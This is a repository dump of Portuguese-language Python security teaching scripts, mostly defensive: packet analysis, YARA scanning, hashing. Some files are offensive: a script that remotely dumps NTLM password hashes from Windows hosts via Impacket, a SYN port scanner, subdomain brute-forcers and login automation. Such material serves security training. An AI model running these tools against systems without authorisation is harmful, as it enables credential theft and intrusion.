-------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/6_CAP_PyShark/exemplo_analise_trafego_malicioso.py: -------------------------------------------------------------------------------- 1 | import pyshark 2 | 3 | def analyze_pcap(file_path): 4 | """Analisa pacotes suspeitos em um arquivo .pcap.""" 5 | print("[+] Analisando pacotes suspeitos no arquivo .pcap...") 6 | 7 | try: 8 | capture = pyshark.FileCapture(file_path, keep_packets=False) 9 | 10 | portas_suspeitas = {'21', '23', '445'} 11 | 12 | for packet in capture: 13 | try: 14 | if 'TCP' in packet and packet.tcp.dstport in portas_suspeitas: 15 | print(f"[ALERTA] Porta suspeita detectada: {packet.tcp.dstport} | IP origem: {packet.ip.src} -> destino: {packet.ip.dst}") 16 | except AttributeError: 17 | # Ignora pacotes que não possuem os atributos esperados 18 | continue 19 | 20 | capture.close() 21 | 22 | except Exception as e: 23 | print(f"[-] Erro durante a análise: {e}") 24 | 25 | if __name__ == "__main__": 26 | arquivo_pcap = input("Digite o caminho do arquivo .pcap: ") 27 | analyze_pcap(arquivo_pcap) 28 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/6_CAP_PyShark/exemplo_captura_pacote_http_dns.py: -------------------------------------------------------------------------------- 1 | import pyshark 2 | 3 | def capture_http_dns(interface): 4 | """Captura pacotes HTTP e DNS para identificar atividades suspeitas.""" 5 | print("[+] Iniciando captura de pacotes HTTP e DNS...") 6 | 7 | try: 8 | # Captura pacotes HTTP e DNS na interface fornecida 9 | capture = pyshark.LiveCapture(interface=interface, display_filter='http or dns') 10 | 11 | # Exibe pacotes HTTP e DNS encontrados 12 | for packet in capture: 13 | if 'HTTP' in packet: 14 | print(f"[+] Requisição HTTP -> Host: {packet.http.host}") 15 | elif 'DNS' in packet: 16 | print(f"[+] Consulta DNS -> Domínio: {packet.dns.qry_name}") 17 | 18 | except KeyboardInterrupt: 19 | print("[-] Captura interrompida pelo usuário.") 20 | 21 | except Exception as e: 22 | print(f"[-] Erro durante a captura: {e}") 23 | 24 | if __name__ == "__main__": 25 | interface = input("Digite a interface de rede (ex: eth0, wlan0): ") 26 | capture_http_dns(interface) 27 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/8_CAP_yara_python/exemplo_de_escaneamento_de_diretorio.py: -------------------------------------------------------------------------------- 1 | import yara 2 | import os 3 | 4 | def scan_directory(rule_path, directory_path): 5 | """Escaneia um diretório inteiro utilizando regras YARA.""" 6 | try: 7 | # Compila a regra YARA 8 | rules = yara.compile(filepath=rule_path) 9 | 10 | # Percorre os arquivos do diretório 11 | for root, _, files in os.walk(directory_path): 12 | for file in files: 13 | file_path = os.path.join(root, file) 14 | matches = rules.match(file_path) 15 | if matches: 16 | print(f"[+] Ameaça detectada no arquivo {file_path}") 17 | for match in matches: 18 | print(f" - Regra correspondente: {match.rule}") 19 | except Exception as e: 20 | print(f"[-] Erro durante a varredura: {e}") 21 | 22 | if __name__ == "__main__": 23 | regra = input("Digite o caminho da regra YARA: ") 24 | diretorio = input("Digite o caminho do diretório a ser analisado: ") 25 | 26 | scan_directory(regra, diretorio) 27 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/11_CAP_Hashlib/exemplo_verifica_integrid_sha_256.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | 3 | def file_hash(file_path): 4 | """Gera um hash SHA-256 para um arquivo.""" 5 | sha256_hash = hashlib.sha256() 6 | 7 | # Lê o arquivo em blocos para evitar sobrecarga de memória 8 | with open(file_path, "rb") as file: 9 | while chunk := file.read(4096): 10 | sha256_hash.update(chunk) 11 | 12 | # Retorna o hash gerado em formato hexadecimal 13 | return sha256_hash.hexdigest() 14 | 15 | def verify_integrity(file_path, expected_hash): 16 | """Verifica se um arquivo corresponde ao hash esperado.""" 17 | file_hash_value = file_hash(file_path) 18 | if file_hash_value == expected_hash: 19 | print("[+] O arquivo é legítimo e não foi alterado.") 20 | else: 21 | print("[-] O arquivo foi modificado ou corrompido.") 22 | 23 | if __name__ == "__main__": 24 | caminho_arquivo = input("Digite o caminho do arquivo a ser verificado: ") 25 | hash_esperado = input("Digite o hash esperado para validação: ") 26 | 27 | verify_integrity(caminho_arquivo, hash_esperado) 28 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/3_CAP_Impacket/extracao_de_hashes_NTLM.py: -------------------------------------------------------------------------------- 1 | from impacket.examples.secretsdump import RemoteOperations, SAMHashes 2 | from impacket.smbconnection import SMBConnection 3 | 4 | def dump_hashes(ip, username, password): 5 | """Extrai hashes NTLM armazenados em uma máquina Windows.""" 6 | try: 7 | conn = SMBConnection(ip, ip) 8 | conn.login(username, password) 9 | print(f"[+] Conectado ao host: {ip}") 10 | 11 | # Manipulação remota do registro do Windows 12 | remote_ops = RemoteOperations(conn, False) 13 | remote_ops.enableRegistry() 14 | 15 | # Extração de hashes NTLM 16 | sam_hashes = SAMHashes(remote_ops, conn, False) 17 | sam_hashes.dump() 18 | 19 | remote_ops.finish() 20 | conn.close() 21 | 22 | except Exception as e: 23 | print(f"[-] Erro durante a extração dos hashes: {e}") 24 | 25 | if __name__ == "__main__": 26 | ip = input("Digite o endereço IP do alvo: ") 27 | usuario = input("Digite o nome de usuário: ") 28 | senha = input("Digite a senha: ") 29 | 30 | dump_hashes(ip, usuario, senha) 31 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/9_CAP_Requests_HTML/exemplo_crawler_web_mapear_estrutura_paginas.py: -------------------------------------------------------------------------------- 1 | from requests_html import HTMLSession 2 | from urllib.parse import urljoin 3 | 4 | def web_crawler(url, depth=2): 5 | """Crawleia links internos de uma página web para mapear estruturas ocultas.""" 6 | session = HTMLSession() # Inicia uma sessão HTTP 7 | visited = set() # Conjunto para armazenar links já visitados 8 | 9 | def crawl(url, current_depth): 10 | """Função recursiva para mapear páginas internas.""" 11 | if current_depth > depth or url in visited: 12 | return 13 | visited.add(url) 14 | print(f"[+] Visitando: {url}") 15 | 16 | response = session.get(url) 17 | for link in response.html.absolute_links: 18 | if url in link: # Apenas links internos 19 | crawl(link, current_depth + 1) 20 | 21 | crawl(url, 1) 22 | 23 | if __name__ == "__main__": 24 | site = input("Digite a URL inicial para o crawler: ") 25 | profundidade = int(input("Digite a profundidade máxima (padrão: 2): ")) 26 | 27 | web_crawler(site, profundidade) 28 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/6_CAP_PyShark/exemplo_de_detec_tentativas_login_ftp.py: -------------------------------------------------------------------------------- 1 | import pyshark 2 | 3 | def capture_ftp_attempts(interface): 4 | """Monitora tentativas de login FTP para detectar atividades suspeitas.""" 5 | print("[+] Iniciando monitoramento de tentativas de login FTP...") 6 | 7 | try: 8 | capture = pyshark.LiveCapture(interface=interface, display_filter='ftp') 9 | 10 | for packet in capture: 11 | try: 12 | if hasattr(packet, 'ftp') and hasattr(packet.ftp, 'request_command') and packet.ftp.request_command == 'USER': 13 | print(f"[+] Tentativa de login FTP - Usuário: {packet.ftp.request_arg}") 14 | except AttributeError: 15 | continue # Pula pacotes FTP que não contêm o campo esperado 16 | 17 | except KeyboardInterrupt: 18 | print("[-] Captura interrompida pelo usuário.") 19 | 20 | except Exception as e: 21 | print(f"[-] Erro durante a captura: {e}") 22 | 23 | if __name__ == "__main__": 24 | interface = input("Digite a interface de rede (ex: eth0, wlan0): ") 25 | capture_ftp_attempts(interface) 26 | -------------------------------------------------------------------------------- /find_links_in_host_pt/crawler_links_pt.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from bs4 import BeautifulSoup 3 | 4 | def get_all_hrefs(url): 5 | 6 | try: 7 | 8 | response = requests.get(url, timeout=5) 9 | response.raise_for_status() 10 | html_content = response.text 11 | 12 | soup = BeautifulSoup(html_content, 'html.parser') 13 | 14 | hrefs = [a['href'] for a in soup.find_all('a', href=True)] 15 | return hrefs 16 | 17 | except requests.exceptions.RequestException as e: 18 | print(f"Erro ao acessar a URL: {e}") 19 | return [] 20 | except Exception as e: 21 | print(f"Erro ao processar a página: {e}") 22 | return [] 23 | 24 | if __name__ == "__main__": 25 | url = input("[URL] (https): ") 26 | hrefs = get_all_hrefs(url) 27 | 28 | if hrefs: 29 | print("\n==========[LINKS ENCONTRADOS]==========\n") 30 | for href in hrefs: 31 | if "/" in href[0]: 32 | print(f'{url}{href}') 33 | else: 34 | print(href) 35 | 36 | print("\n==========[LINKS ENCONTRADOS]==========\n") 37 | else: 38 | print("[!][ LINKS NOT FOUND ][!]") -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/11_CAP_Hashlib/exemplo_assint_digital_hmac_sha_256.py: -------------------------------------------------------------------------------- 1 | import hmac 2 | import hashlib 3 | 4 | def generate_signature(message, secret_key): 5 | """Gera uma assinatura digital utilizando HMAC-SHA256.""" 6 | signature = hmac.new(secret_key.encode(), message.encode(), hashlib.sha256).hexdigest() 7 | return signature 8 | 9 | def verify_signature(message, secret_key, expected_signature): 10 | """Verifica se a assinatura digital corresponde ao esperado.""" 11 | generated_signature = generate_signature(message, secret_key) 12 | if generated_signature == expected_signature: 13 | print("[+] Assinatura válida e mensagem autêntica.") 14 | else: 15 | print("[-] Assinatura inválida ou mensagem adulterada.") 16 | 17 | if __name__ == "__main__": 18 | mensagem = input("Digite a mensagem original: ") 19 | chave_secreta = input("Digite a chave secreta: ") 20 | 21 | assinatura = generate_signature(mensagem, chave_secreta) 22 | print(f"Assinatura digital gerada: {assinatura}") 23 | 24 | assinatura_verificacao = input("Digite a assinatura para verificação: ") 25 | verify_signature(mensagem, chave_secreta, assinatura_verificacao) 26 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/2_CAP_Scapy/scanner_portas_tcp.py: -------------------------------------------------------------------------------- 1 | from scapy.all import IP, TCP, sr1, conf 2 | 3 | # Desabilita logs adicionais do Scapy para tornar a saída mais limpa 4 | conf.verb = 0 5 | 6 | def scan_port(ip, port): 7 | """Verifica se uma porta TCP está aberta ou fechada.""" 8 | 9 | # Cria um pacote TCP com flag SYN ativada 10 | packet = IP(dst=ip) / TCP(dport=port, flags='S') 11 | 12 | # Envia o pacote e aguarda uma única resposta 13 | response = sr1(packet, timeout=1) 14 | 15 | # Analisa a resposta recebida 16 | if response is None: 17 | print(f"Porta {port} está fechada ou filtrada.") 18 | elif response.haslayer(TCP) and response.getlayer(TCP).flags == 0x12: 19 | print(f"Porta {port} está ABERTA.") 20 | 21 | # Envia um pacote RST (Reset) para encerrar a conexão 22 | sr1(IP(dst=ip) / TCP(dport=port, flags='R'), timeout=1) 23 | else: 24 | print(f"Porta {port} está fechada ou filtrada.") 25 | 26 | if __name__ == "__main__": 27 | alvo = input("Digite o endereço IP alvo: ") 28 | portas = [22, 80, 443, 3306, 8080] # Lista padrão de portas comuns 29 | 30 | for porta in portas: 31 | scan_port(alvo, porta) 32 | -------------------------------------------------------------------------------- /find_cookies/valid_cookies.py: -------------------------------------------------------------------------------- 1 | from playwright.sync_api import sync_playwright 2 | 3 | urls = open(r"find_cookies\urls_to_verify.txt", "r", encoding="utf-8").read().splitlines() 4 | 5 | with sync_playwright() as p: 6 | browser = p.firefox.launch(headless=True) 7 | context = browser.new_context( 8 | user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0 Safari/537.36", 9 | viewport={"width": 1280, "height": 720}, 10 | java_script_enabled=True, 11 | locale="pt-BR") 12 | for url in urls: 13 | try: 14 | page = browser.new_page() 15 | page.goto(f"https://{url}") 16 | content = page.content() 17 | 18 | # Verifica se existe alguma palavra-chave comum nos banners 19 | if any(kw in content.lower() for kw in ['cookie', 'consent', 'aceita os cookies']): 20 | print(f"[✔] Tarja de cookies detectada em: {url}") 21 | with open("contem_tarja_cookies.txt", "a", encoding="utf-8") as file: 22 | file.write(url + "\n") 23 | else: 24 | print(f"[✘] Sem tarja de cookies detectada em: {url}") 25 | except Exception as error: 26 | print(f"[✘] {url} not response") 27 | pass 28 | 29 | browser.close() 30 | 31 | -------------------------------------------------------------------------------- /find_redirect_url/find_redirect_url_pt.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from colorama import init, Fore 3 | 4 | 5 | def response_valid_302(url): 6 | try: 7 | response = requests.get(url=url, allow_redirects=False, timeout=2) 8 | response_status_code = response.status_code 9 | redirected_url = None 10 | 11 | if response_status_code == 302: 12 | redirected_url = response.headers['Location'] 13 | return True, response_status_code, redirected_url 14 | 15 | return False, response_status_code, redirected_url 16 | except requests.ConnectionError as error: 17 | return f"[ERROR] - {error}" 18 | 19 | 20 | def redirect_url_execute(url, positive_c, negative_c, reset_c): 21 | boolean_value, status_code, redirect = response_valid_302(url) 22 | 23 | if boolean_value == True: 24 | print(f"{positive_c}[!] FIND REDIRECT URL - {url} | REDIRECT - {redirect} {reset_c}") 25 | else: 26 | print(f"{negative_c}[!] TRY URL - {url} {reset_c}") 27 | 28 | 29 | if __name__ == "__main__": 30 | init() 31 | GREEN_COLOR = Fore.GREEN 32 | RESET_COLOR = Fore.RESET 33 | RED_COLOR = Fore.RED 34 | 35 | URL = input("[$] URL(http/https): ") 36 | 37 | redirect_url_execute(URL.lower(), GREEN_COLOR, RED_COLOR, RESET_COLOR) 38 | 39 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/4_CAP_Paramiko/trasnferencia_segura_arquivo_via_sftp.py: -------------------------------------------------------------------------------- 1 | import paramiko 2 | 3 | def sftp_transfer(ip, username, password, local_file, remote_file): 4 | """Realiza uma transferência segura de arquivos via SFTP.""" 5 | try: 6 | # Inicializa uma conexão segura via SFTP 7 | transport = paramiko.Transport((ip, 22)) 8 | transport.connect(username=username, password=password) 9 | 10 | # Inicializa o cliente SFTP 11 | sftp = paramiko.SFTPClient.from_transport(transport) 12 | 13 | # Envia o arquivo local para o destino remoto 14 | sftp.put(local_file, remote_file) 15 | 16 | print(f"[+] Arquivo '{local_file}' enviado com sucesso para '{remote_file}'.") 17 | 18 | # Fecha as conexões SFTP e SSH 19 | sftp.close() 20 | transport.close() 21 | 22 | except Exception as e: 23 | print(f"[-] Falha na transferência de arquivos: {e}") 24 | 25 | if __name__ == "__main__": 26 | ip = input("Digite o endereço IP do servidor: ") 27 | usuario = input("Digite o nome de usuário: ") 28 | senha = input("Digite a senha: ") 29 | arquivo_local = input("Digite o caminho do arquivo local: ") 30 | arquivo_remoto = input("Digite o caminho do arquivo remoto: ") 31 | 32 | sftp_transfer(ip, usuario, senha, arquivo_local, arquivo_remoto) 33 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/10_CAP_Socket/exemplo_servidor_tcp_simples.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | def server_tcp(host, port): 4 | """Servidor TCP que aceita conexões e responde às mensagens.""" 5 | try: 6 | # Cria um socket TCP 7 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 8 | 9 | # Liga o servidor ao IP e porta especificados 10 | server.bind((host, port)) 11 | 12 | # Permite até 5 conexões simultâneas 13 | server.listen(5) 14 | print(f"Servidor iniciado em {host}:{port}") 15 | 16 | # Loop para aceitar conexões indefinidamente 17 | while True: 18 | client, addr = server.accept() 19 | print(f"Conexão recebida de {addr[0]}:{addr[1]}") 20 | 21 | # Recebe mensagem do cliente 22 | mensagem = client.recv(1024).decode() 23 | print(f"Mensagem recebida: {mensagem}") 24 | 25 | # Envia uma resposta para o cliente 26 | resposta = "Mensagem recebida com sucesso." 27 | client.send(resposta.encode()) 28 | 29 | # Fecha a conexão com o cliente 30 | client.close() 31 | except Exception as e: 32 | print(f"Erro no servidor: {e}") 33 | 34 | if __name__ == "__main__": 35 | ip = "0.0.0.0" 36 | porta = int(input("Digite a porta para o servidor: ")) 37 | 38 | server_tcp(ip, porta) 39 | -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/9_CAP_Requests_HTML/exemplo_de_preenchimento_de_formulario_login.py: -------------------------------------------------------------------------------- 1 | from requests_html import HTMLSession 2 | 3 | def login_automation(url, username, password): 4 | """Automatiza o preenchimento e envio de um formulário de login.""" 5 | session = HTMLSession() 6 | response = session.get(url) # Acessa a página web 7 | 8 | # Localiza o formulário na página 9 | form = response.html.find("form", first=True) 10 | 11 | if form: 12 | # Identifica a URL de envio do formulário 13 | action_url = form.attrs.get("action") 14 | full_url = url + action_url if "http" not in action_url else action_url 15 | 16 | # Envia os dados de login 17 | data = { 18 | "username": username, 19 | "password": password 20 | } 21 | resultado = session.post(full_url, data=data) 22 | 23 | # Verifica se o login foi bem-sucedido 24 | if "login inválido" in resultado.text.lower(): 25 | print("[-] Login falhou.") 26 | else: 27 | print("[+] Login bem-sucedido.") 28 | else: 29 | print("[-] Nenhum formulário encontrado na página.") 30 | 31 | if __name__ == "__main__": 32 | url = input("Digite a URL da página de login: ") 33 | usuario = input("Digite o nome de usuário: ") 34 | senha = input("Digite a senha: ") 35 | 36 | login_automation(url, usuario, senha) 37 | -------------------------------------------------------------------------------- /dns_verify_pt/dns_enum_pt.py: -------------------------------------------------------------------------------- 1 | import dns 2 | import dns.resolver 3 | import argparse 4 | 5 | 6 | from display_tool import DEFAULT_LINK, BYBLACK, ASCII_PYTHON_TODO_DIA 7 | 8 | def get_dns_info(target, specifydns='', listypes=["A", "AAAA", "CNAME", "MX", "NS", "SOA", "TXT"]): 9 | resolver = dns.resolver.Resolver() 10 | 11 | if specifydns != '': 12 | try: 13 | answers = resolver.resolve(target, specifydns) 14 | print(f'\nDNS RECORDS FOR {target} | [{specifydns}]\n') 15 | for iten in answers: 16 | print(f'> {iten}') 17 | except dns.resolver.NoAnswer: 18 | pass 19 | else: 20 | for type in listypes: 21 | try: 22 | answers = resolver.resolve(target, type) 23 | print(f'\nDNS RECORDS FOR {target} | [{type}]') 24 | for iten in answers: 25 | print(f'> {iten}') 26 | except dns.resolver.NoAnswer: 27 | continue 28 | 29 | if __name__ == "__main__": 30 | 31 | print(ASCII_PYTHON_TODO_DIA) 32 | print(DEFAULT_LINK) 33 | 34 | parser_ = argparse.ArgumentParser() 35 | parser_.add_argument("host", help='') 36 | parser_.add_argument("-spf", "--specify", help='', default='') 37 | 38 | args = parser_.parse_args() 39 | host = args.host 40 | specify = args.specify 41 | 42 | get_dns_info(target=host, specifydns=specify) 43 | -------------------------------------------------------------------------------- /codes_shorts/simple_subdomain_scan.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from concurrent.futures import ThreadPoolExecutor 3 | from colorama import init, Fore 4 | 5 | 6 | def request_validator(subdomain, host): 7 | try: 8 | requests.get(f"http://{subdomain}.{host}") 9 | except requests.ConnectionError: 10 | return False 11 | else: 12 | return True 13 | 14 | 15 | def execute_subdomain_scan(subdomain, host, positive_color, negative_color, reset_color): 16 | if request_validator(subdomain, host): 17 | print(f"{positive_color}[!!] {subdomain}.{host} {reset_color}") 18 | else: 19 | print(f"{negative_color}[//] {subdomain}.{host} {reset_color}", end="\r") 20 | 21 | 22 | 23 | if __name__ == "__main__": 24 | init() 25 | GREEN_COLOR = Fore.GREEN 26 | RESET_COLOR = Fore.RESET 27 | RED_COLOR = Fore.RED 28 | 29 | HOST = input("[$] HOST: ") 30 | LIST_SUB = input("[$] LIST_SUB: ") 31 | THREADS = input("[$] THREADS: ") 32 | 33 | list_to_read = open(fr"{LIST_SUB}", 'r', 34 | encoding='utf-8').read().splitlines() 35 | 36 | print(f"\n[#] EXECUTING SUBDOMAIN SCAN -> {HOST} USING {THREADS} THREADS [#] \n") 37 | 38 | with ThreadPoolExecutor(max_workers=int(THREADS)) as executor: 39 | for subd in list_to_read: 40 | executor.submit(execute_subdomain_scan, 41 | subd, HOST, 42 | GREEN_COLOR, RED_COLOR, RESET_COLOR) -------------------------------------------------------------------------------- /simple_scan_subdomain_pt/subdomain_scan_python_todo_dia.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from concurrent.futures import ThreadPoolExecutor 3 | from colorama import init, Fore 4 | 5 | 6 | def request_validator(subdomain, host): 7 | try: 8 | requests.get(f"http://{subdomain}.{host}") 9 | except requests.ConnectionError: 10 | return False 11 | else: 12 | return True 13 | 14 | 15 | def execute_subdomain_scan(subdomain, host, positive_color, negative_color, reset_color): 16 | if request_validator(subdomain, host): 17 | print(f"{positive_color}[!!] {subdomain}.{host} {reset_color}") 18 | else: 19 | print(f"{negative_color}[//] {subdomain}.{host} {reset_color}", end="\r") 20 | 21 | 22 | if __name__ == "__main__": 23 | init() 24 | GREEN_COLOR = Fore.GREEN 25 | RESET_COLOR = Fore.RESET 26 | RED_COLOR = Fore.RED 27 | 28 | HOST = input("[$] HOST: ") 29 | LIST_SUB = input("[$] LIST_SUB: ") 30 | THREADS = input("[$] THREADS: ") 31 | 32 | list_to_read = open(fr"{LIST_SUB}", 'r', 33 | encoding='utf-8').read().splitlines() 34 | 35 | print(f"\n[#] EXECUTING SUBDOMAIN SCAN -> {HOST} USING {THREADS} THREADS [#] \n") 36 | 37 | with ThreadPoolExecutor(max_workers=int(THREADS)) as executor: 38 | for subd in list_to_read: 39 | executor.submit(execute_subdomain_scan, 40 | subd, HOST, 41 | GREEN_COLOR, RED_COLOR, RESET_COLOR) -------------------------------------------------------------------------------- /Python_para_CyberSecurity_Ataque_e_Defesa/4_CAP_Paramiko/exemplo_conexao_ssh_execucao_de_comand.py: -------------------------------------------------------------------------------- 1 | import paramiko 2 | 3 | def ssh_command(ip, username, password, command): 4 | """Conecta-se a um host via SSH e executa um comando remoto.""" 5 | try: 6 | # Inicializa o cliente SSH 7 | client = paramiko.SSHClient() 8 | 9 | # Permite aceitar automaticamente a chave SSH do host remoto 10 | client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 11 | 12 | # Estabelece a conexão SSH com o host remoto 13 | client.connect(ip, username=username, password=password) 14 | 15 | # Executa o comando remoto 16 | stdin, stdout, stderr = client.exec_command(command) 17 | 18 | # Exibe a saída padrão (stdout) do comando 19 | print(f"Saída:\n{stdout.read().decode().strip()}") 20 | 21 | # Verifica se houve erro durante a execução 22 | error = stderr.read().decode().strip() 23 | if error: 24 | print(f"Erro:\n{error}") 25 | 26 | # Fecha a conexão SSH 27 | client.close() 28 | 29 | except Exception as e: 30 | print(f"[-] Falha na conexão ou execução do comando: {e}") 31 | 32 | if __name__ == "__main__": 33 | ip = input("Digite o endereço IP do servidor: ") 34 | usuario = input("Digite o nome de usuário: ") 35 | senha = input("Digite a senha: ") 36 | comando = input("Digite o comando a ser executado: ") 37 | 38 | ssh_command(ip, usuario, senha, comando) 39 | -------------------------------------------------------------------------------- /block_mouse_key/keyboards_use.py: -------------------------------------------------------------------------------- 1 | keys = [ 2 | 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 3 | '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 4 | '`', '~', '!', '@', '#', '$', '%', '^', '&', '*', '(', ')', '_', '-', '=', '+', 5 | '[', '{', ']', '}', '\\', '|', 6 | ';', ':', "'", '"', 7 | ',', '<', '.', '>', '/', 8 | ' ', # Barra de espaço 9 | '\t', # Tabulação 10 | '\n', # Nova linha 11 | 'f1', 'f2', 'f3', 'f4', 'f5', 'f6', 'f7', 'f8', 'f9', 'f10', 'f11', 'f12', 12 | 'insert', 'delete', 'home', 'end', 'page up', 'page down', 13 | 'up', 'down', 'left', 'right', 14 | 'backspace', 'enter', 'return', 'space', 15 | 'tab', 'caps lock', 'num lock', 'scroll lock', 16 | 'print screen', 'pause', 17 | 'menu', 'windows', 'command', 'option', 'alt', 'ctrl', 'control', 18 | ] 19 | 20 | 21 | def block_keyboard(keyboard, tecla): 22 | def on_key_event(e): 23 | #global wait_keys_press 24 | if keyboard.is_pressed('esc+shift'): 25 | print("[!] Desbloqueando todas as teclas...") 26 | keyboard.unhook_all() # Desbloqueia todas as teclas 27 | #wait_keys_press = True 28 | 29 | keyboard.hook(on_key_event) 30 | 31 | # Bloqueia a tecla inicialmente 32 | keyboard.block_key(tecla) 33 | print(f"[!] KEYBOARD BLOCK - {tecla}") 34 | 35 | def wait_for_press(keyboard, variable_to_acess): 36 | variable_to_acess 37 | keyboard.wait('esc+shift') 38 | variable_to_acess = True 39 | 40 | -------------------------------------------------------------------------------- /client_server_send_file_pt/client_file.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import os 3 | 4 | 5 | HOST = '127.0.0.1' 6 | PORT = 5000 7 | BUFFER_SIZE = 4096 8 | MAX_FILE_SIZE = 100 * 1024 * 1024 9 | 10 | def send_file(client_socket, filename): 11 | if not os.path.isfile(filename): 12 | print(f"Arquivo não encontrado: {filename}") 13 | return 14 | 15 | file_size = os.path.getsize(filename) 16 | if file_size > MAX_FILE_SIZE: 17 | print(f"O arquivo {filename} é muito grande (tamanho: {file_size} bytes).") 18 | return 19 | 20 | 21 | client_socket.sendall(os.path.basename(filename).encode('utf-8')) 22 | client_socket.recv(BUFFER_SIZE) 23 | 24 | client_socket.sendall(str(file_size).encode('utf-8')) 25 | client_socket.recv(BUFFER_SIZE) 26 | 27 | 28 | with open(filename, 'rb') as file: 29 | while chunk := file.read(BUFFER_SIZE): 30 | client_socket.sendall(chunk) 31 | 32 | print(f"Arquivo {filename} enviado com sucesso.") 33 | 34 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client_socket: 35 | client_socket.connect((HOST, PORT)) 36 | print("Conectado ao servidor.") 37 | 38 | while True: 39 | command = input("\nDigite o caminho do arquivo para enviar ou 'sair' para encerrar: ") 40 | if command.lower() == 'sair': 41 | client_socket.sendall(b'EXIT') 42 | print("Conexão encerrada.") 43 | break 44 | elif os.path.isfile(command): 45 | send_file(client_socket, command) 46 | else: 47 | print("Arquivo inválido ou não encontrado.") 48 | -------------------------------------------------------------------------------- /client_server_send_file_pt/server_file.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import os 3 | 4 | 5 | HOST = '0.0.0.0' 6 | PORT = 5000 7 | BUFFER_SIZE = 4096 8 | SAVE_DIR = 'recebidos/' 9 | 10 | if not os.path.exists(SAVE_DIR): 11 | os.makedirs(SAVE_DIR) 12 | 13 | 14 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server_socket: 15 | server_socket.bind((HOST, PORT)) 16 | server_socket.listen(5) 17 | print(f"Servidor aguardando conexão na porta {PORT}...") 18 | 19 | conn, addr = server_socket.accept() 20 | with conn: 21 | print(f"Conexão estabelecida com {addr}") 22 | 23 | while True: 24 | 25 | filename = conn.recv(BUFFER_SIZE).decode('utf-8') 26 | if filename == 'EXIT': 27 | print("Cliente encerrou a conexão.") 28 | break 29 | 30 | conn.sendall(b'FILENAME_RECEIVED') 31 | 32 | 33 | file_size = int(conn.recv(BUFFER_SIZE).decode('utf-8')) 34 | conn.sendall(b'SIZE_RECEIVED') 35 | 36 | 37 | filepath = os.path.join(SAVE_DIR, filename) 38 | with open(filepath, 'wb') as file: 39 | bytes_received = 0 40 | while bytes_received < file_size: 41 | chunk = conn.recv(min(BUFFER_SIZE, file_size - bytes_received)) 42 | if not chunk: 43 | break 44 | file.write(chunk) 45 | bytes_received += len(chunk) 46 | 47 | print(f"Arquivo {filename} recebido e salvo em {filepath}") 48 | -------------------------------------------------------------------------------- /metadata_pt/find_metada_pt.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from pprint import pprint 3 | from PIL import Image 4 | from PIL.ExifTags import TAGS 5 | import pikepdf 6 | 7 | 8 | def get_image_metadata(image_file): 9 | image = Image.open(image_file) 10 | info_dict = { 11 | "Filename": image.filename, 12 | "Image Size": image.size, 13 | "Image Height": image.height, 14 | "Image Width": image.width, 15 | "Image Format": image.format, 16 | "Image Mode": image.mode, 17 | "Image is Animated": getattr(image, "is_animated", False), 18 | "Frames in Image": getattr(image, "n_frames", 1) 19 | } 20 | exifdata = image.getexif() 21 | for tag_id in exifdata: 22 | tag = TAGS.get(tag_id, tag_id) 23 | data = exifdata.get(tag_id) 24 | if isinstance(data, bytes): 25 | data = data.decode() 26 | info_dict[tag] = data 27 | return info_dict 28 | 29 | 30 | def get_pdf_metadata(pdf_file): 31 | try: 32 | # Abre o PDF 33 | pdf = pikepdf.Pdf.open(pdf_file) 34 | 35 | # Retorna os metadados como um dicionário 36 | return dict(pdf.docinfo) 37 | except Exception as e: 38 | print(f"Erro ao extrair metadados do PDF: {e}") 39 | return {} 40 | 41 | 42 | if __name__ == "__main__": 43 | file = sys.argv[1] 44 | if file.endswith(".pdf"): 45 | print(get_pdf_metadata(file)) 46 | elif file.lower( 47 | 48 | ).endswith((".jpg", ".jpeg", ".png", ".bmp", ".gif", ".tiff")): 49 | pprint(get_image_metadata(file)) 50 | else: 51 | print(f"Unsupported file format: {file}") -------------------------------------------------------------------------------- /metadata_pt/understand_code_metada_pt.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from pprint import pprint 3 | from PIL import Image 4 | from PIL.ExifTags import TAGS 5 | import pikepdf 6 | 7 | 8 | def get_image_metadata(image_file): 9 | image = Image.open(image_file) 10 | info_dict = { 11 | "Filename": image.filename, 12 | "Image Size": image.size, 13 | "Image Height": image.height, 14 | "Image Width": image.width, 15 | "Image Format": image.format, 16 | "Image Mode": image.mode, 17 | "Image is Animated": getattr(image, "is_animated", False), 18 | "Frames in Image": getattr(image, "n_frames", 1) 19 | } 20 | exifdata = image.getexif() 21 | for tag_id in exifdata: 22 | tag = TAGS.get(tag_id, tag_id) 23 | data = exifdata.get(tag_id) 24 | if isinstance(data, bytes): 25 | data = 